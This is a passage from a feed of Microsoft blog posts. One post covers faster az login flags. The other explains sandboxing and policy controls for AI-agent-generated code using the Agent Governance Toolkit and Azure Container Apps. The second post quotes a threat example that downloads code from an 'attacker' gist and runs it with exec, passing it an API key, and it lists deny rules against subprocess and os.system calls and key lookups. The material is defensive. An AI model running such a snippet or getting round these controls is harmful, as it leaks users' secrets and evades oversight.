&lt;H2 data-line="25"&gt;What's new&lt;/H2&gt;
&lt;H3 data-line="27"&gt;1.&amp;nbsp;--skip-subscription-discovery&amp;nbsp;(alias&amp;nbsp;--skip-sub)&lt;/H3&gt;
&lt;P data-line="36"&gt;Authenticate only.&amp;nbsp;&lt;STRONG&gt;Skip the subscription enumeration entirely.&lt;/STRONG&gt;&amp;nbsp;No tenant fan-out, no ARM&amp;nbsp;GET /subscriptions&amp;nbsp;calls per tenant. This flag&amp;nbsp;&lt;STRONG&gt;requires&amp;nbsp;--tenant&lt;/STRONG&gt;&amp;nbsp;— since discovery is skipped, you must tell the CLI which tenant to authenticate against.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P data-line="28"&gt;az login --tenant &amp;lt;TENANT_ID&amp;gt; --skip-subscription-discovery&lt;/P&gt;
&lt;P data-line="28"&gt;# or the short form&lt;/P&gt;
&lt;P data-line="28"&gt;az login --tenant &amp;lt;TENANT_ID&amp;gt; --skip-sub&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P data-line="44"&gt;After this,&amp;nbsp;az account list&amp;nbsp;will be empty until you explicitly populate it (e.g. by&amp;nbsp;az login --subscription &amp;lt;id&amp;gt;&amp;nbsp;later, or by running a command that targets a subscription you know).&lt;/P&gt;
&lt;P data-line="46"&gt;The flag is independent of&amp;nbsp;&lt;EM&gt;how&lt;/EM&gt;&amp;nbsp;you authenticate — interactive (the WAM account picker or browser), device code, service principal, or managed identity all work the same way. You complete your normal sign-in, just without the subscription enumeration afterward.&lt;/P&gt;
&lt;P data-line="48"&gt;&lt;STRONG&gt;Best for:&lt;/STRONG&gt;&lt;/P&gt;
&lt;UL data-line="49"&gt;
&lt;LI data-line="49"&gt;&lt;STRONG&gt;Users who belong to many tenants, or tenants with hundreds-to-thousands of subscriptions&lt;/STRONG&gt;&amp;nbsp;— this is where the win is biggest, because you skip the enumeration that scales with&amp;nbsp;&lt;EM&gt;(tenants) × (subscriptions per tenant)&lt;/EM&gt;. Pin the one subscription you need via&amp;nbsp;--subscription&amp;nbsp;or&amp;nbsp;AZURE_SUBSCRIPTION_ID.&lt;/LI&gt;
&lt;LI data-line="50"&gt;Local developers who hit&amp;nbsp;az login&amp;nbsp;dozens of times a day and only ever work in one subscription. (You'll still get the interactive WAM account picker — that's the auth step; only the post-auth subscription enumeration is skipped.)&lt;/LI&gt;
&lt;LI data-line="51"&gt;Secondary: CI/CD with service principals or managed identities that already know the exact subscription, and cross-tenant guests who don't need the full catalog every login.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-line="53"&gt;&lt;STRONG&gt;What you'll see:&lt;/STRONG&gt;&amp;nbsp;--skip-subscription-discovery&amp;nbsp;does&amp;nbsp;&lt;STRONG&gt;not&lt;/STRONG&gt;&amp;nbsp;suppress the interactive sign-in prompt — it only skips the post-auth tenant/subscription enumeration. On an interactive login (no cached or still-valid token), the Web Account Manager (WAM) account picker still appears so you can authenticate; the flag simply skips the catalog fetch&amp;nbsp;&lt;EM&gt;after&lt;/EM&gt;&amp;nbsp;you've signed in.&lt;/P&gt;
&lt;P data-line="55"&gt;The screenshot below is Windows, where the broker (WAM) drives sign-in. On&amp;nbsp;&lt;STRONG&gt;Linux and macOS&lt;/STRONG&gt;&amp;nbsp;there's no WAM — the interactive step is a browser redirect (or a device code in headless/SSH environments) instead. The flag's behavior, and the performance win, are identical on every platform; only this sign-in UI differs.&lt;/P&gt;
&lt;img /&gt;
&lt;P data-line="57"&gt;&amp;nbsp;&lt;/P&gt;
&lt;H3 data-line="44"&gt;2. Targeted&amp;nbsp;--subscription &amp;lt;id-or-name&amp;gt;&amp;nbsp;on&amp;nbsp;az login&lt;/H3&gt;
&lt;P data-line="59"&gt;Sign in&amp;nbsp;&lt;STRONG&gt;and&lt;/STRONG&gt;&amp;nbsp;set a specific subscription as the active context in one step.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;az login --subscription 00000000-0000-0000-0000-000000000000&lt;/P&gt;
&lt;P&gt;az login --subscription "Contoso Production"&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P data-line="66"&gt;The CLI authenticates and sets the subscription you named as active.&amp;nbsp;&lt;STRONG&gt;But note:&lt;/STRONG&gt;&amp;nbsp;on its own,&amp;nbsp;--subscription&amp;nbsp;does&amp;nbsp;&lt;STRONG&gt;not&lt;/STRONG&gt;&amp;nbsp;skip discovery — the CLI still enumerates every tenant and every subscription you have access to, and only&amp;nbsp;&lt;EM&gt;then&lt;/EM&gt;&amp;nbsp;selects the one you named as active. So if you have many subscriptions, this is still slow; you've just saved yourself a follow-up&amp;nbsp;az account set.&lt;/P&gt;
&lt;P data-line="68"&gt;To actually skip the full fetch, combine it with --skip-subscription-discovery (see below).&lt;/P&gt;
&lt;H3 data-line="65"&gt;3. The combo&lt;/H3&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;az login --tenant &amp;lt;TENANT_ID&amp;gt; --subscription &amp;lt;SUB_ID&amp;gt; --skip-subscription-discovery&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P data-line="76"&gt;You get: authenticated session + active subscription set + zero tenant fan-out. With both flags, the CLI fetches&amp;nbsp;&lt;STRONG&gt;only&lt;/STRONG&gt;&amp;nbsp;the subscription you named and skips the global enumeration entirely — this is the only way to get both a pinned subscription&amp;nbsp;&lt;EM&gt;and&lt;/EM&gt; a fast login. It's the fastest path to a working CLI for a known target.&lt;/P&gt;
&lt;H2 data-line="67"&gt;How much faster?&lt;/H2&gt;
&lt;P data-line="82"&gt;Real-world impact scales with&amp;nbsp;&lt;STRONG&gt;how many tenants you belong to and how many subscriptions each tenant holds&lt;/STRONG&gt;&amp;nbsp;— the bigger that product, the more you save. Order-of-magnitude observations from the field:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Profile&lt;/th&gt;&lt;th&gt;Typical&amp;nbsp;az login&amp;nbsp;time&lt;/th&gt;&lt;th&gt;With&amp;nbsp;--skip-subscription-discovery&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;1 tenant, 1–3 subs (typical dev)&lt;/td&gt;&lt;td&gt;~3–5 s&lt;/td&gt;&lt;td&gt;~2–3 s&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;1 tenant, hundreds–thousands of subs&lt;/td&gt;&lt;td&gt;20–60+ s&lt;/td&gt;&lt;td&gt;~2–3 s&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Many tenants, each with hundreds+ subs (the headline case)&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;&lt;STRONG&gt;1–several minutes&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;&lt;STRONG&gt;~2–3 s&lt;/STRONG&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;CI/CD with service principal, 1 known sub&lt;/td&gt;&lt;td&gt;5–10 s&lt;/td&gt;&lt;td&gt;~1 s&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P data-line="91"&gt;The savings come entirely from cutting the per-tenant ARM enumeration — and they grow the more tenants and subscriptions you have.&lt;/P&gt;
&lt;H2 data-line="82"&gt;When&amp;nbsp;&lt;EM&gt;not&lt;/EM&gt;&amp;nbsp;to use these flags&lt;/H2&gt;
&lt;UL data-line="97"&gt;
&lt;LI data-line="99"&gt;&lt;STRONG&gt;You genuinely don't know which subscription you need&lt;/STRONG&gt;&amp;nbsp;and rely on&amp;nbsp;az account list&amp;nbsp;/&amp;nbsp;az account set&amp;nbsp;after login to pick. Plain&amp;nbsp;az login&amp;nbsp;is still the right call.&lt;/LI&gt;
&lt;LI data-line="100"&gt;&lt;STRONG&gt;You manage resources across many subscriptions in one session.&lt;/STRONG&gt;&amp;nbsp;Without discovery,&amp;nbsp;az account list&amp;nbsp;will be empty and tab-completion of subscriptions won't work. (Tip: run a one-time&amp;nbsp;az account list --refresh&amp;nbsp;later to populate.)&lt;/LI&gt;
&lt;LI data-line="101"&gt;&lt;STRONG&gt;First-time setup on a new machine&lt;/STRONG&gt; where you want to see what you have access to.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-line="111"&gt;Try it now&lt;/H2&gt;
&lt;P data-line="107"&gt;Make sure you're on a recent&amp;nbsp;az&amp;nbsp;CLI:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;az version&lt;/P&gt;
&lt;P&gt;az upgrade # if needed&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P data-line="114"&gt;Then:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;az login --tenant &amp;lt;your-tenant&amp;gt; --subscription &amp;lt;your-sub&amp;gt; --skip-subscription-discovery&lt;/P&gt;
&lt;P&gt;az group list -o table&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H2 data-line="129"&gt;Links &amp;amp; references&lt;/H2&gt;
&lt;UL data-line="144"&gt;
&lt;LI data-line="125"&gt;&lt;STRONG&gt;az login&amp;nbsp;reference (official docs)&lt;/STRONG&gt;&amp;nbsp;— full flag list including&amp;nbsp;--skip-subscription-discovery&amp;nbsp;/&amp;nbsp;--skip-sub&amp;nbsp;and&amp;nbsp;--subscription:&amp;nbsp;&lt;A href="https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login" data-href="https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login" target="_blank"&gt;https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login&lt;/A&gt;&lt;/LI&gt;
&lt;LI data-line="126"&gt;&lt;STRONG&gt;Sign in with Azure CLI (how-to)&lt;/STRONG&gt;&amp;nbsp;—&amp;nbsp;&lt;A href="https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli" data-href="https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli" target="_blank"&gt;https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli&lt;/A&gt;&lt;/LI&gt;
&lt;LI data-line="127"&gt;&lt;STRONG&gt;Azure CLI release notes&lt;/STRONG&gt;&amp;nbsp;—&amp;nbsp;&lt;A href="https://learn.microsoft.com/en-us/cli/azure/release-notes-azure-cli" data-href="https://learn.microsoft.com/en-us/cli/azure/release-notes-azure-cli" target="_blank"&gt;https://learn.microsoft.com/en-us/cli/azure/release-notes-azure-cli&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-line="138"&gt;Feedback wanted&lt;/H2&gt;
&lt;P data-line="152"&gt;If this changes your day-to-day login experience —&amp;nbsp;&lt;STRONG&gt;especially if you live across many tenants with hundreds or thousands of subscriptions&lt;/STRONG&gt;&amp;nbsp;— we'd love to hear from you. Concrete before/after timings for those high-scale topologies are gold.&lt;/P&gt;
&lt;UL data-line="154"&gt;
&lt;LI data-line="135"&gt;&lt;STRONG&gt;Found a bug or have a feature request?&lt;/STRONG&gt;&amp;nbsp;File an issue on the Azure CLI repo:&amp;nbsp;&lt;A href="https://github.com/Azure/azure-cli/issues/new/choose" data-href="https://github.com/Azure/azure-cli/issues/new/choose" target="_blank"&gt;https://github.com/Azure/azure-cli/issues/new/choose&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Sun, 07 Jun 2026 07:19:58 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-tools-blog/faster-az-login-introducing-skip-subscription-discovery-and/ba-p/4526116</guid>
      <dc:creator>Alex-wdy</dc:creator>
      <dc:date>2026-06-07T07:19:58Z</dc:date>
    </item>
    <item>
      <title>Govern AI Agents Using Agent Governance Toolkit and Azure Container App Sandboxes</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/govern-ai-agents-using-agent-governance-toolkit-and-azure/ba-p/4526011</link>
      <description>&lt;P&gt;When you let a model generate code and you actually execute it, you are handing the model a Python REPL on whatever machine runs the agent. That sounds alarmist — right up until a planner (yours, mine, or anyone else's) produces a snippet that reads as harmless on the first pass:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;# "summarize the changelog" import urllib.request, os data = urllib.request.urlopen( "https://gist.githubusercontent.com/attacker/.../raw" ).read() exec(data, {"OPENAI_API_KEY": os.environ["OPENAI_API_KEY"]})&lt;/LI-CODE&gt;
&lt;P data-line="20"&gt;Two lines of mostly-stdlib Python. If it runs in your application process, the model just decided it could pull arbitrary code off the internet and pass your secrets into it. Today that's a hypothetical; tomorrow it's a postmortem.&lt;/P&gt;
&lt;P data-line="25"&gt;The defense splits into two questions developers can actually answer:&lt;/P&gt;
&lt;OL data-line="27"&gt;
&lt;LI data-line="27"&gt;&lt;STRONG&gt;Where does the code run?&lt;/STRONG&gt;&amp;nbsp;Not in your process. A&amp;nbsp;&lt;EM&gt;sandbox&lt;/EM&gt;&amp;nbsp;— a separate, disposable execution environment with its own CPU, memory, filesystem and network — gives you a hard boundary so a bad snippet can crash itself, not your service. Sandboxes have shipped in many flavors (containers, micro-VMs, wasm); the new one in this post is&amp;nbsp;&lt;STRONG&gt;Azure Container Apps sandbox&lt;/STRONG&gt;, where each agent session gets a managed, per-session container with a fail-closed egress proxy in front, scaled and operated by Azure.&lt;/LI&gt;
&lt;LI data-line="35"&gt;&lt;STRONG&gt;What is the code allowed to do?&lt;/STRONG&gt;&amp;nbsp;A sandbox alone is a wide playing field — an attacker who wins a sandbox still has the whole sandbox.&amp;nbsp;&lt;EM&gt;Policy&lt;/EM&gt;&amp;nbsp;narrows the field. A single YAML&amp;nbsp;PolicyDocument&amp;nbsp;says: these tools, these hosts, these CPU / memory / time budgets, no&amp;nbsp;subprocess, no&amp;nbsp;pip install, no substring match on&amp;nbsp;OPENAI_API_KEY. The first cut is enforced&amp;nbsp;&lt;STRONG&gt;on the host by AGT policy&lt;/STRONG&gt;&amp;nbsp;(deny rules, tool allowlist, AST scan) so denied snippets never even leave your process; the network cut is enforced&amp;nbsp;&lt;STRONG&gt;inside the ACA sandbox by the egress allowlist&lt;/STRONG&gt;&amp;nbsp;so an outbound call to a non-allowed host fails closed at the proxy. Same document, two layers, no drift.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P data-line="47"&gt;&lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit" target="_blank" rel="noopener"&gt;AGT &lt;/A&gt;ships a Python package — agt-sandbox — that answers both, and a recently added sandbox provider that was recently announced in Build 2026 - Azure container app sandboxes. The rest of this post walks through what's in the agt-sandbox package, the abstraction it pivots on, the new ACA provider, how it composes with AGT policy, and a full LLM-planned research agent built on top.&lt;/P&gt;
&lt;H2 data-line="56"&gt;1. What is Azure Container Apps sandbox?&lt;/H2&gt;
&lt;P data-line="58"&gt;&lt;A href="https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131" target="_blank" rel="noopener" data-href="https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131"&gt;Azure Container Apps Sandboxes&lt;/A&gt;&amp;nbsp;(public preview, June 2, 2026) are a first-class Azure resource —&amp;nbsp;Microsoft.App/SandboxGroups&amp;nbsp;— purpose-built for running untrusted, agent-generated code. Each sandbox runs in its own&amp;nbsp;&lt;STRONG&gt;hardware-isolated microVM&lt;/STRONG&gt;, boots in sub-second time from an OCI disk image, and can suspend/resume from full memory + disk snapshots for scale-to-zero economics on stateful compute. It's the same primitive that powers Cloud sandboxes in GitHub Copilot, Foundry Hosted Agents, and ACA Express.&lt;/P&gt;
&lt;P data-line="68"&gt;See -&amp;nbsp;&lt;A href="https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131" target="_blank" rel="noopener" data-href="https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131"&gt;https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131&lt;/A&gt;&amp;nbsp;for more info on the service&lt;/P&gt;
&lt;P data-line="71"&gt;If you've used&amp;nbsp;&lt;A href="https://learn.microsoft.com/en-us/azure/container-apps/sessions" target="_blank" rel="noopener" data-href="https://learn.microsoft.com/en-us/azure/container-apps/sessions"&gt;ACA Dynamic Sessions&lt;/A&gt;, Sandboxes are the next evolution and where new work should target.&lt;/P&gt;
&lt;H2 data-line="76"&gt;2. What's in the agt-sandbox package&lt;/H2&gt;
&lt;P data-line="78"&gt;agt-sandbox (PyPI:&amp;nbsp;&lt;A href="https://pypi.org/project/agt-sandbox/" target="_blank" rel="noopener" data-href="https://pypi.org/project/agt-sandbox/"&gt;agt-sandbox&lt;/A&gt;, import name:&amp;nbsp;agent_sandbox) is the execution-isolation layer of AGT. It is intentionally small. Its job is to take a snippet of agent- generated code and run it somewhere that is&amp;nbsp;&lt;STRONG&gt;not&lt;/STRONG&gt;&amp;nbsp;your application process — under policy, with a structured result.&lt;/P&gt;
&lt;P data-line="84"&gt;The package contains:&lt;/P&gt;
&lt;UL data-line="86"&gt;
&lt;LI data-line="86"&gt;&lt;STRONG&gt;SandboxProvider&lt;/STRONG&gt;&amp;nbsp;— the abstract base class every backend implements (next section).&lt;/LI&gt;
&lt;LI data-line="88"&gt;&lt;STRONG&gt;Three built-in providers&lt;/STRONG&gt;, each gated behind an install extra so you only pull what you need:
&lt;UL data-line="90"&gt;
&lt;LI data-line="90"&gt;DockerSandboxProvider&amp;nbsp;— hardened OCI containers, with an optional auto-upgrade to gVisor or Kata when present (pip install "agt-sandbox[docker]").&lt;/LI&gt;
&lt;LI data-line="93"&gt;HyperLightSandboxProvider&amp;nbsp;— sub-millisecond&amp;nbsp;&lt;A href="https://github.com/hyperlight-dev/hyperlight" target="_blank" rel="noopener" data-href="https://github.com/hyperlight-dev/hyperlight"&gt;Hyperlight&lt;/A&gt;&amp;nbsp;micro-VMs over KVM / mshv / WHP (pip install "agt-sandbox[hyperlight]").&lt;/LI&gt;
&lt;LI data-line="96"&gt;ACASandboxProvider&amp;nbsp;— Azure Container Apps managed sandbox sessions (pip install "agt-sandbox[azure]");&amp;nbsp;&lt;STRONG&gt;the focus of this post&lt;/STRONG&gt;.&lt;/LI&gt;
&lt;/UL&gt;
&lt;/LI&gt;
&lt;LI data-line="99"&gt;&lt;STRONG&gt;Shared dataclasses&lt;/STRONG&gt;&amp;nbsp;—&amp;nbsp;SandboxConfig,&amp;nbsp;SandboxResult,&amp;nbsp;SessionHandle,&amp;nbsp;ExecutionHandle, plus&amp;nbsp;SessionStatus&amp;nbsp;/&amp;nbsp;ExecutionStatus&amp;nbsp;enums. Every provider returns these same types, so calling code never special-cases the backend.&lt;/LI&gt;
&lt;LI data-line="104"&gt;&lt;STRONG&gt;Policy-projection helpers&lt;/STRONG&gt; — small per-provider functions (docker_config_from_policy,&amp;nbsp;aca_config_from_policy, …) that translate the AGT&amp;nbsp;PolicyDocument&amp;nbsp;into provider-native settings (CPU / memory caps, egress rules, env vars).&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-line="112"&gt;3. The&amp;nbsp;SandboxProvider&amp;nbsp;ABC&lt;/H2&gt;
&lt;P data-line="114"&gt;SandboxProvider is the contract every backend implements. The abstract surface is deliberately minimal:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;class SandboxProvider(ABC): @abstractmethod def create_session(self, agent_id, policy=None, config=None) -&amp;gt; SessionHandle: ... @abstractmethod def execute_code(self, agent_id, session_id, code, *, context=None) -&amp;gt; ExecutionHandle: ... @abstractmethod def destroy_session(self, agent_id, session_id) -&amp;gt; None: ... @abstractmethod def is_available(self) -&amp;gt; bool: ...&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P data-line="132"&gt;Every method has an&amp;nbsp;*_async&amp;nbsp;variant that delegates to the sync implementation through&amp;nbsp;asyncio.to_thread&amp;nbsp;by default, so an async agent can call&amp;nbsp;await provider.execute_code_async(...)&amp;nbsp;without each provider having to ship its own event-loop story.&lt;/P&gt;
&lt;P data-line="137"&gt;The contract features four things, and writing against the ABC means you get all of them no matter which backend is plugged in:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Feature&lt;/th&gt;&lt;th&gt;What it means&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Per-session isolation&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;One&amp;nbsp;(agent_id, session_id)&amp;nbsp;pair maps to exactly one sandbox; concurrent agents do not share state&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Policy as a first-class argument&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;create_session&amp;nbsp;accepts a&amp;nbsp;PolicyDocument; the provider projects it onto its native primitives&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Host-side&amp;nbsp;PolicyEvaluator&amp;nbsp;gate&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Every&amp;nbsp;execute_code&amp;nbsp;call runs the evaluator&amp;nbsp;&lt;STRONG&gt;before&lt;/STRONG&gt;&amp;nbsp;dispatching code; denied calls never touch the backend&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Structured&amp;nbsp;SandboxResult&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Same success / exit_code / stdout / stderr / killed / kill_reason / duration_seconds shape from all backends&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P data-line="147"&gt;Per-session isolation is the right unit of granularity because a session is also the natural unit for blast radius and identity: within one session the agent's working state survives across execute_code calls (same (agent_id, session_id) → same sandbox in the provider's cache), and when the session is destroyed the sandbox is deleted with it. Different sessions get different sandboxes — create_session always provisions a fresh one and returns a new session_id, so there is no in-process pathway for state to flow from one session to the next.&lt;/P&gt;
&lt;P data-line="157"&gt;The hard isolation between two live sandboxes — that a compromised session cannot read another session's filesystem, memory, or network — is ultimately an&amp;nbsp;&lt;STRONG&gt;Azure platform guarantee&lt;/STRONG&gt;&amp;nbsp;about inter-sandbox isolation within a sandbox group, not something AGT itself enforces. The provider is a thin lifecycle driver.&lt;/P&gt;
&lt;P data-line="163"&gt;The abstraction matters in practice because&amp;nbsp;&lt;STRONG&gt;the same agent code works on every backend&lt;/STRONG&gt;. You write your planner against SandboxProvider and you choose Docker, Hyperlight for local sandboxes and ACA for managed cloud sandboxes — by swapping one constructor:&lt;/P&gt;
&lt;H2 data-line="171"&gt;4. The new&amp;nbsp;ACASandboxProvider&lt;/H2&gt;
&lt;P data-line="173"&gt;ACASandboxProvider&amp;nbsp;is the most recent addition in AGT. It drives the early-access&amp;nbsp;&lt;A href="https://github.com/microsoft/azure-container-apps" target="_blank" rel="noopener" data-href="https://github.com/microsoft/azure-container-apps"&gt;azure-containerapps-sandbox&lt;/A&gt;&amp;nbsp;Python SDK so an agent step can run in a managed Azure-side container without any of the usual infrastructure plumbing.&lt;/P&gt;
&lt;P data-line="179"&gt;Under the hood,&amp;nbsp;ACASandboxProvider&amp;nbsp;wires the three&amp;nbsp;SandboxProvider&amp;nbsp;lifecycle methods straight onto the ACA SDK. Here's what each one actually does for you:&lt;/P&gt;
&lt;P data-line="185"&gt;&lt;STRONG&gt;create_session(agent_id, policy=None, config=None)&lt;/STRONG&gt;&amp;nbsp;— provisions a fresh ACA sandbox for the agent and applies the policy's resource caps and egress allowlist.&amp;nbsp;&lt;EM&gt;Returns&lt;/EM&gt;&amp;nbsp;a&amp;nbsp;SessionHandle.&lt;/P&gt;
&lt;P data-line="189"&gt;&lt;STRONG&gt;execute_code(agent_id, session_id, code, *, context=None)&lt;/STRONG&gt;&amp;nbsp;— runs host-side policy checks, then executes the snippet inside the sandbox. A policy denial raises&amp;nbsp;PermissionError.&amp;nbsp;&lt;EM&gt;Returns&lt;/EM&gt;&amp;nbsp;an&amp;nbsp;ExecutionHandle&amp;nbsp;carrying a&amp;nbsp;SandboxResult.&lt;/P&gt;
&lt;P data-line="194"&gt;&lt;STRONG&gt;destroy_session(agent_id, session_id)&lt;/STRONG&gt;&amp;nbsp;— deletes the underlying ACA sandbox and evicts cached state.&amp;nbsp;&lt;EM&gt;Returns&lt;/EM&gt;&amp;nbsp;None.&lt;/P&gt;
&lt;P data-line="197"&gt;The lifecycle in code looks like this:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import os from agent_sandbox import ACASandboxProvider from agent_os.policies import PolicyDocument policy = PolicyDocument.from_yaml("policies/aca_research_agent.yaml") provider = ACASandboxProvider( resource_group=os.environ["AZURE_RG"], sandbox_group="agents", region=os.environ["AZURE_REGION"], disk="python-3.13", # constructor-level, not per-session ensure_group_location=os.environ["AZURE_REGION"], ) # create_session takes (agent_id, policy=..., config=...). The policy carries # the network allowlist and the CPU/memory/timeout defaults. handle = provider.create_session("research-agent-1", policy=policy) # execute_code takes (agent_id, session_id, code, *, context=...). # The timeout is read from the session config that was projected from # policy.defaults.timeout_seconds at create_session time. exec_handle = provider.execute_code( "research-agent-1", handle.session_id, "import urllib.request as u; print(u.urlopen('https://arxiv.org').status)", context={"intent": "smoke-test arxiv reachability"}, ) print(exec_handle.result.stdout) provider.destroy_session("research-agent-1", handle.session_id)&lt;/LI-CODE&gt;
&lt;P data-line="232"&gt;ACA Sandboxes hit the sweet spot for a production agent platform on Azure: managed (no nodes or Kubernetes to operate), regional and autoscaled, fast enough for per-session creation, integrated with VNet / managed identity / Log Analytics, and rich enough on Azure-native primitives that the AGT policy bundle can be rendered into platform-level controls automatically.&lt;/P&gt;
&lt;H2 data-line="241"&gt;5. How&amp;nbsp;ACASandboxProvider&amp;nbsp;integrates with Agent governance toolkit policy&lt;/H2&gt;
&lt;P data-line="243"&gt;The provider's contribution to governance is that it makes a single&amp;nbsp;PolicyDocument&amp;nbsp;enforce in three different places, with the most expensive checks running last.&lt;/P&gt;
&lt;P data-line="247"&gt;&lt;STRONG&gt;Before any Azure round-trip (host-side, in your process):&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL data-line="249"&gt;
&lt;LI data-line="249"&gt;The host-side&amp;nbsp;PolicyEvaluator&amp;nbsp;(constructed once per session) evaluates&amp;nbsp;deny&amp;nbsp;rules over&amp;nbsp;code&amp;nbsp;/&amp;nbsp;tool_name,&amp;nbsp;tool_allowlist, and the per-call&amp;nbsp;context. A deny becomes&amp;nbsp;PermissionError. This runs on&amp;nbsp;&lt;STRONG&gt;every&lt;/STRONG&gt;&amp;nbsp;execute_code&amp;nbsp;call, so a denied step costs zero Azure cycles.&lt;/LI&gt;
&lt;LI data-line="254"&gt;enforce_no_subprocess_execution then walks the snippet's AST and raises SandboxCodeViolation if subprocess.*, os.system, os.execve, os.spawn*, or wildcard imports of those modules appear. This catches the cases where a contains rule misses (e.g. obfuscated imports, from subprocess import Popen as p).&lt;/LI&gt;
&lt;/OL&gt;
&lt;P data-line="260"&gt;&lt;STRONG&gt;At sandbox creation (Azure-side, once per session):&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL data-line="262"&gt;
&lt;LI data-line="262"&gt;aca_config_from_policy&amp;nbsp;projects&amp;nbsp;defaults.max_cpu&amp;nbsp;/&amp;nbsp;defaults.max_memory_mb&amp;nbsp;onto the sandbox's CPU and memory ceilings.&lt;/LI&gt;
&lt;LI data-line="265"&gt;network_allowlist&amp;nbsp;plus&amp;nbsp;defaults.network_default&amp;nbsp;are turned into a typed&amp;nbsp;EgressPolicy(default_action="Deny", host_rules=[EgressHostRule(pattern, action="Allow"), …])&amp;nbsp;and applied via&amp;nbsp;SandboxClient.set_egress_policy. The policy is&amp;nbsp;&lt;STRONG&gt;fail-closed by default&lt;/STRONG&gt;&amp;nbsp;— even with an empty allowlist you get a sandbox with no outbound network.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P data-line="272"&gt;&lt;STRONG&gt;Per execution:&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL data-line="274"&gt;
&lt;LI data-line="274"&gt;&lt;EM&gt;Azure-side, every call.&lt;/EM&gt;&amp;nbsp;The egress proxy enforces (4) on every outbound connection inside the sandbox. A blocked host produces an HTTP 403 inside the guest; the snippet's own error handler can detect that, and the provider's caller surfaces it as a&amp;nbsp;blocked-at-egress&amp;nbsp;outcome.&lt;/LI&gt;
